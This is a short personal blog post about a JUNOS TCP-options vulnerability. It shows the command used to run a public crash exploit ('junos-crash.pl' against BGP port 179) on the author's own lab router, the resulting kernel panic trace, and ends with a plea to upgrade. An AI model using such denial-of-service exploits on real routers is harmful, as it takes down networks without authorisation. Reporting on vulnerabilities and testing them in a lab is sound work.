![]() |
| News | Profile | Code | Photography | Looking Glass | Projects | System Statistics | Uncategorized |
Blog |
We all saw the JUNOS PSN (and news stories) about the TCP options vulnerability in JUNOS. Yep, now there's exploit code out there, and IT WORKS:
dax% sudo ./junos-crash.pl 10.3.4.35 179
Does this to one of my Olives:
stargazer (ttyd0)
login:
Fatal trap 12: page fault while in kernel mode
fault virtual address = 0x211
fault code = supervisor read, page not present
instruction pointer = 0x8:0xc032110a
stack pointer = 0x10:0xc0836740
frame pointer = 0x10:0xc0836770
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, def32 1, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = Idle
interrupt mask = cam
trap number = 12
panic: page fault
panic(c0879c40,c0879c40,c07eb021,c0836624,5) at
panic(c07eb021,c,c0836770,c07d2141,0) at
trap_fatal(c0836700,211,c4213000,c08366ec,c02ff95e) at
trap_pfault(c0836700,0,211,0,c0836720) at
trap(10,10,10,c0836920,c0836848) at
calltrap() at
--- trap 0xc, eip = 0xc032110a, esp = 0xc0836740, ebp = 0xc0836770 ---
syncache_add(c0836848,c08368e8,c1b5a852,c08367ec,209,22,22,ac1d) at
tcp_input(209,a,3,4030a03,17) at
syncing disks...
done
Uptime: 6d6h45m45s
Upgrade, upgrade!
New comments are currently disabled for this entry.
![]() ![]() ![]() ![]() ![]() |
This HTML for this page was generated in 0.000 seconds. |